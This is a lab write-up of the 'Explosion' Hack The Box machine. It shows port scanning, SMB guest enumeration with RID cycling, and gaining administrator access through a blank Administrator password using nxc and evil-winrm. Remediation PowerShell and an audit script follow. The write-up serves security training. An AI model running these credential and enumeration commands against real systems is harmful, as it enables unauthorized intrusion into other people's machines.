TL;DR
Explosion is a Windows Server 2019 box with a single critical misconfiguration: the built-in Administrator account has a blank password. A port scan reveals SMB (445), RDP (3389), and WinRM (5985). SMB guest login enumerates the machine name and RID-cycles the Administrator account. Testing Administrator with a blank password via nxc immediately returns Pwn3d! over both SMB and WinRM. The flag sits on the Administrator’s desktop at C:\Users\Administrator\Desktop\flag.txt. The lesson: always test default and blank credentials before reaching for a wordlist.
Recon
1. Liveness check
$ ping -c 3 10.129.36.59
PING 10.129.36.59 (10.129.36.59): 56 data bytes
Request timeout for icmp_seq 0
100% packet loss
ICMP filtered — Windows Server often blocks ICMP at the host firewall. Use -Pn with nmap.
2. Top-1000 port sweep
$ sudo nmap -sS -Pn --top-ports 1000 -T4 10.129.36.59
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
Classic Windows fingerprint:
- 135 — Microsoft RPC endpoint mapper
- 139/445 — SMB (NetBIOS session service + microsoft-ds)
- 3389 — RDP (Remote Desktop Protocol — the box name “Explosion” is a hint)
- 5985 — WinRM (Windows Remote Management, used by PowerShell remoting and evil-winrm)
3. Service detection + script scan
$ sudo nmap -sS -Pn -sV -sC -p 135,139,445,3389,5985 10.129.36.59
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: EXPLOSION
| NetBIOS_Computer_Name: EXPLOSION
| DNS_Computer_Name: Explosion
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-27T13:55:38+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Key data points:
- Machine name: EXPLOSION (from RDP NTLM info — exposed before any auth)
- OS: Windows 10.0.17763 = Windows Server 2019 Build 17763
- SMB signing: not required (relay attacks possible)
Foothold
Dead end #1 — anonymous SMB
$ smbclient -N -L //10.129.36.59
session setup failed: NT_STATUS_ACCESS_DENIED
Pure anonymous blocked. Guest still allowed?
$ nxc smb 10.129.36.59 -u 'guest' -p ''
EXPLOSION\guest: — [+] login accepted (no Pwn3d! = no admin rights)
Guest is accepted but there are no interesting non-admin shares. Only ADMIN$, C$, and IPC$ — all require elevated credentials.
Dead end #2 — common passwords for Administrator
The Administrator account (RID 500) was found via RID cycling through IPC$:
$ nxc smb 10.129.36.59 -u 'guest' -p '' --rid-brute
500: EXPLOSION\Administrator (SidTypeUser)
Before trying blank, tested several common Windows passwords:
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'explosion'
EXPLOSION\Administrator:explosion → STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Explosion'
STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Password1'
STATUS_LOGON_FAILURE
All failed. Then tried the obvious:
Working approach — Administrator with blank password
$ nxc smb 10.129.36.59 -u 'Administrator' -p ''
SMB 10.129.36.59 445 EXPLOSION [+] Explosion\Administrator: (Pwn3d!)
Pwn3d! — nxc’s notation for administrator-level SMB access confirmed.
Verify WinRM works too:
$ nxc winrm 10.129.36.59 -u 'Administrator' -p ''
WINRM 10.129.36.59 5985 EXPLOSION [+] Explosion\Administrator: (Pwn3d!)
Both SMB and WinRM accept the blank password. Full administrative access.
Command execution via WinRM
$ nxc winrm 10.129.36.59 -u 'Administrator' -p '' \
-X 'whoami; hostname; Get-ComputerInfo | Select-Object WindowsProductName, OsVersion'
[+] Executed command (shell type: powershell)
explosion\administrator
Explosion
WindowsProductName OsVersion
------------------ ---------
Windows Server 2019 Standard 10.0.17763
Flag collection
Get-ChildItem -Path C:\Users\Administrator\Desktop
# flag.txt - 34 bytes - 4/23/2021 2:51 AM
Get-Content C:\Users\Administrator\Desktop\flag.txt
[REDACTED]
Interactive session (evil-winrm)
For a proper interactive shell (required for more complex post-exploitation):
evil-winrm -i 10.129.36.59 -u Administrator -p ''
Note: On macOS, the system Ruby (2.6) is too old for evil-winrm 3.9. Fix: brew install ruby && /opt/homebrew/opt/ruby/bin/gem install evil-winrm.
Privilege Escalation
N/A — The Administrator account with a blank password already provides NT AUTHORITY\SYSTEM-equivalent access (Administrator on a standalone Windows machine is the highest local privilege). No escalation step required.
What’s actually broken
- Blank Administrator password. The single most critical finding. Windows' built-in Administrator account (RID 500) with an empty password is a direct full-system compromise. This violates CIS Control 5.4 (Default Credentials), STIG WN19-AC-000110, and every sensible password policy.
- SMB guest access enabled. Allows unauthenticated clients to enumerate shares and — via IPC$ — RID-cycle to discover account names.
- WinRM exposed. Port 5985 reachable from the internet. WinRM should be restricted to management networks only.
- SMB signing not required. A relay attacker on the same segment can forward captured NTLM challenges to other Windows hosts.
- Administrator account not renamed. The known RID-500 account should be renamed or disabled; a separate named admin account should be used instead.
Remediation (the boring half)
Set a strong Administrator password immediately:
$SecurePassword = ConvertTo-SecureString "R@nd0m!P@ssw0rd#2024" -AsPlainText -Force
Set-LocalUser -Name "Administrator" -Password $SecurePassword
Disable guest SMB access:
# Turn off the SMB1 dialect (hardening, independent of guest access)
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Disabling the Guest account is what actually closes the guest session used for RID cycling
Disable-LocalUser -Name "Guest"
Require SMB signing:
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
Restrict WinRM to management VLAN:
# Allow only from 10.10.0.0/16
New-NetFirewallRule -Name "WinRM-Restrict" -DisplayName "WinRM Management Only" `
-Protocol TCP -LocalPort 5985 -RemoteAddress "10.10.0.0/16" `
-Action Allow
Disable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
Disable the built-in Administrator account and create a named admin:
Disable-LocalUser -Name "Administrator"
New-LocalUser -Name "svc-mgmt" -Password (Read-Host -AsSecureString)
Add-LocalGroupMember -Group "Administrators" -Member "svc-mgmt"
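To confirm the remediation actually took, here is an added post-remediation audit for the five findings listed under "What's actually broken" (example code written for this writeup, not part of the original, and not an HTB or NetExec tool). It runs as a local administrator on the host; $MgmtSubnet is an assumed value.

```powershell
# Added example: audit the Explosion findings after remediation. Run elevated on the host.
$MgmtSubnet = "10.10.0.0/16"   # assumed management network; adjust to yours
$Findings = @()

# 1. Blank Administrator password: validate an empty password against the local SAM.
#    This mirrors the network logon nxc performed; a hardened host rejects it.
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$ctx = New-Object System.DirectoryServices.AccountManagement.PrincipalContext('Machine')
if ($ctx.ValidateCredentials('Administrator', '')) {
    $Findings += "Administrator accepts a blank password"
}

# 2. Built-in RID-500 account: resolve by SID suffix, since it may have been renamed.
$builtin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
if ($builtin.Enabled) { $Findings += "RID-500 account '$($builtin.Name)' is still enabled" }
if ($builtin.Name -eq 'Administrator') { $Findings += "RID-500 account has not been renamed" }

# 3. Guest account: an enabled Guest is what allowed the share listing and RID cycling.
if ((Get-LocalUser -Name 'Guest').Enabled) { $Findings += "Guest account is enabled" }

# 4. SMB signing must be required (relay defence); SMB1 should be off.
$smb = Get-SmbServerConfiguration
if (-not $smb.RequireSecuritySignature) { $Findings += "SMB signing is not required" }
if ($smb.EnableSMB1Protocol) { $Findings += "SMB1 is still enabled" }

# 5. WinRM exposure: any enabled inbound allow rule on TCP/5985 whose remote scope is 'Any'.
#    Rules scoped to a subnet are listed for review (the cmdlet reports them in IP/mask form).
$rules = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True |
    Where-Object { ($_ | Get-NetFirewallPortFilter).LocalPort -contains '5985' }
foreach ($r in $rules) {
    $remote = ($r | Get-NetFirewallAddressFilter).RemoteAddress
    if ($remote -contains 'Any') {
        $Findings += "Rule '$($r.Name)' allows WinRM from any address (expected: $MgmtSubnet)"
    } else {
        Write-Host "INFO: rule '$($r.Name)' allows WinRM from $($remote -join ', ')"
    }
}

if ($Findings.Count -eq 0) { "PASS: all Explosion findings remediated" }
else { $Findings | ForEach-Object { "FAIL: $_" } }
```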
Lessons learned
- Try blank before trying wordlists. The single most impactful test on a fresh Windows machine is Administrator with an empty password. It takes one request and costs nothing. Wordlists come after.
- RDP NTLM info leaks machine metadata pre-auth. The rdp-ntlm-info nmap script extracts the machine name, domain, and exact Windows build version from the NTLM negotiation — no credentials required. This is normal Windows behavior, not a vulnerability.
- WinRM is PowerShell remoting over HTTP. When SMB is available, psexec/wmiexec are the typical choices. When SMB is reachable but the admin share needs credentials you lack, or when SMB is firewalled, WinRM on 5985 is the alternative. Both are in the standard pentest toolkit.
- Pwn3d! in nxc output means local admin. NetExec's color-coding and Pwn3d! marker specifically indicate that the tested credentials have local administrator rights — useful for distinguishing regular user auth from privileged access at a glance.
References
- HTB Starting Point — official page
- Microsoft Docs — WinRM configuration
- MITRE ATT&CK T1021.006 — Windows Remote Management
- CIS Benchmark for Windows Server 2019 — Section 1.1.1 — password complexity
- DISA STIG WN19-AC-000110 — built-in administrator account password policy